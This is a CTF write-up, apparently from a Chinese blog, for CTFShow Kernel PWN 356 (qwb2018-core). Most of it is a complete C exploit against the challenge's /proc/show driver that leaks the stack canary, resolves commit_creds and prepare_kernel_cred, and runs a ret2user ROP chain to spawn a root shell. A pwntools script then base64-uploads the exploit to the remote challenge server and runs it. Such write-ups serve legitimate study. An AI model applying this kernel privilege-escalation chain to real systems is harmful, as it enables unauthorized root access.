
CTFShow PWN入门---Kernel PWN 356-360 [持续更新]

PWN 356

本题和强网杯 2018 的 qwb2018-core 一模一样。
详细请看我之前的文章: Kernel PWN 入门(二)

exp:

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <string.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/ioctl.h>

/* User-mode register state captured by save_status() and replayed through the
 * iretq frame that main() places at the end of its ROP chain. */
size_t user_cs, user_ss, user_rflags, user_sp;
/* Kernel text base when KASLR is off.  main() subtracts it from the kallsyms
 * value of startup_64 to get the slide ("offset") applied to the hard-coded
 * gadget addresses below. */
size_t nokalsr_kernel_base = 0xffffffff81000000;
/* Resolved from /tmp/kallsyms in main(); read by get_root(). */
size_t prepare_kernel_cred_addr;
size_t commit_creds_addr;

/* Save cs, ss, rsp and rflags of the current user-mode context into the
 * globals above (Intel-syntax inline asm).  Must run before the chain in
 * main() is triggered, because the iretq frame there is built from them. */
void save_status()
{
    __asm__("mov user_cs, cs;""mov user_ss, ss;""mov user_sp, rsp;""pushf;""pop user_rflags;");
    puts("[*]status has been saved.");
}

/* Landing point after the iretq in the chain: spawn a shell if the process is
 * now uid 0, otherwise report failure and exit(-1). */
void get_shell(){
    if(getuid()==0){
        printf("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m\n");
        system("/bin/sh");
    }else{
        puts("[-] get root shell failed.");
        exit(-1);
    }
}

/* ret2user: this function is entered from the ROP chain while still in kernel
 * mode and calls commit_creds(prepare_kernel_cred(0)) through the addresses
 * resolved in main().
 * NOTE(review): the function-pointer initialisations convert a size_t to a
 * pointer without a cast; C compilers warn about this and C++ rejects it.
 * NOTE(mitigation): running user pages in ring 0 like this is exactly what
 * SMEP/SMAP (and KPTI for the return path) are designed to stop; the
 * challenge kernel is assumed to have them off - confirm against the linked
 * earlier write-up. */
void get_root(){           //ret2user
    char* (*pkc)(int) = prepare_kernel_cred_addr;
    void (*cc)(char*) = commit_creds_addr;
    (*cc)((*pkc)(0));
}

/* Driver ioctl wrappers.  The request numbers are the challenge driver's own
 * (taken as given by the write-up); each returns 0 on success, -1 on failure.
 * NOTE(review): all three print "[*]show_read failed" - copy-paste leftover in
 * set_off() and show_copy_func(); the messages should name their own call. */

/* Read from the driver buffer at the current offset into *addr. */
int show_read(int fd,size_t* addr){
    if(ioctl(fd,1719109787,addr)==-1){
        printf("[*]show_read failed");
        return -1;
    }
    return 0;
}

/* Set the driver's read offset (0x40 in main() lands on the stack canary). */
int set_off(int fd,int off){
    if(ioctl(fd,1719109788,off) == -1){
        printf("[*]show_read failed");
        return -1;
    }
    return 0;
}

/* Ask the driver to copy `len` bytes from its buffer onto its kernel stack. */
int show_copy_func(int fd,unsigned long len){
    if(ioctl(fd,1719109786,len)==-1){
        printf("[*]show_read failed");
        return -1;
    }
    return 0;
}

/* Look up `symbol_name` in a kallsyms-format text file ("<addr> <type> <name>"
 * per line) and return its address, or 0 if the file cannot be opened or the
 * symbol is absent (a caller cannot distinguish "not found" from address 0). */
unsigned long get_symbol_address(const char *symbol_name) {
    FILE *fp;
    char line[1024];
    unsigned long address;
    char symbol[1024];
    // Open the symbol table.
    // NOTE(review): the original comment said /proc/kallsyms, but the code
    // reads /tmp/kallsyms - presumably a copy staged there beforehand; confirm
    // against the linked earlier write-up.
    fp = fopen("/tmp/kallsyms", "r");
    if (fp == NULL) {
        perror("fopen");
        return 0;
    }
    // Scan line by line for the requested symbol.
    while (fgets(line, sizeof(line), fp) != NULL) {
        // Parse the address and the name; the one-character type is skipped.
        // NOTE(review): "%s" has no width limit; it cannot overrun here only
        // because symbol[] is as large as line[] - "%1023s" would make the
        // bound explicit.
        if (sscanf(line, "%lx %*c %s", &address, symbol) == 2) {
            // Exact name match: hand back the address.
            if (strcmp(symbol, symbol_name) == 0) {
                fclose(fp);
                return address;
            }
        }
    }
    // Symbol not found: return 0.
    fclose(fp);
    return 0;
}

/* Flow: save user state -> leak the canary through the driver -> resolve
 * kernel symbols from /tmp/kallsyms -> build the chain -> trigger the copy.
 * Return values of the driver wrappers are not checked here. */
int main(){
    save_status();
    //leak stack
    int fd = open("/proc/show",O_RDWR);
    int i = 0;
    size_t stack[16] = {0};
    size_t rop[0x50] = {0};
    // Reading at offset 0x40 returns the canary as the first qword.
    set_off(fd,0x40);
    show_read(fd,stack);
    size_t canary = stack[0];
    printf("canary is ------------->: 0x%lx\n",canary);
    //leak addr
    // KASLR slide = actual startup_64 - no-KASLR base.
    size_t startup_64 = get_symbol_address("startup_64");
    unsigned long offset = startup_64-nokalsr_kernel_base;
    prepare_kernel_cred_addr = get_symbol_address("prepare_kernel_cred");
    commit_creds_addr = get_symbol_address("commit_creds");
    printf("offset is ==========>: %lx\n",offset);
    printf("prepare_kernel_cred_addr is ==========>: %lx\n",prepare_kernel_cred_addr);
    printf("commit_creds_addr is ==========>: %lx\n",commit_creds_addr);
    //rop
    // Gadget addresses are specific to this challenge's kernel image at the
    // no-KASLR base; `offset` rebases them.  pop_rdi_ret is computed but not
    // used by the chain below.
    size_t pop_rdi_ret = 0xffffffff81000b2f+offset;
    size_t swapgs_popfq_ret = 0xffffffff81a012da+offset;
    size_t iretq_ret = 0xffffffff81050ac2+offset;
    // rop[0..9]: padding up to the saved return address; index 8 carries the
    // leaked canary so the stack check on return passes.
    for(int j =0;j<10;j++){
        rop[i++] = 0;
    }
    rop[8] = canary;
    // Return address -> get_root (runs in kernel mode), then swapgs/popfq and
    // an iretq frame (rip, cs, rflags, rsp, ss) back to user mode at get_shell.
    rop[i++] = (size_t)get_root;
    rop[i++] = swapgs_popfq_ret;
    rop[i++] = 0;
    rop[i++] = iretq_ret;
    rop[i++] = (size_t)get_shell;
    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;
    // Stage the chain in the driver buffer, then request the copy.
    // NOTE(review): the length's low bits are 0x100 while the full 64-bit value
    // is huge; presumably the driver checks and copies with different widths -
    // not shown on this page, see the linked earlier write-up.
    write(fd,rop,0x100);
    show_copy_func(fd,0xffffffffffff0100);
    return 0;
}


打远程用的脚本:

from pwn import *
import base64
context.log_level = "debug"

# Read the compiled exploit and base64-encode it so it can be pushed through
# the challenge's line-oriented shell as printable text.
with open("./exp", "rb") as f:
    exp = base64.b64encode(f.read())

p = remote("pwn.challenge.ctf.show", 28290)
#p = process('./run.sh')
try_count = 1

# Nudge the shell into printing a prompt, then wait for it.
p.sendline()
p.recvuntil("/ $")

# Append the base64 text to /tmp/b64_exp in 0x200-byte slices.  Each echo
# produces one prompt; they are all consumed afterwards before continuing.
chunks = [exp[pos:pos + 0x200].decode() for pos in range(0, len(exp), 0x200)]
for chunk in chunks:
    p.sendline("echo -n \"" + chunk + "\" >> /tmp/b64_exp")
count = len(chunks)
log.info("count: " + str(count))
for _ in range(count):
    p.recvuntil("/ $")

# Decode on the target, mark it executable and run it.
p.sendline("cat /tmp/b64_exp | base64 -d > /tmp/exploit")
p.sendline("chmod +x /tmp/exploit")
p.sendline("/tmp/exploit ")
p.interactive()


PWN 357

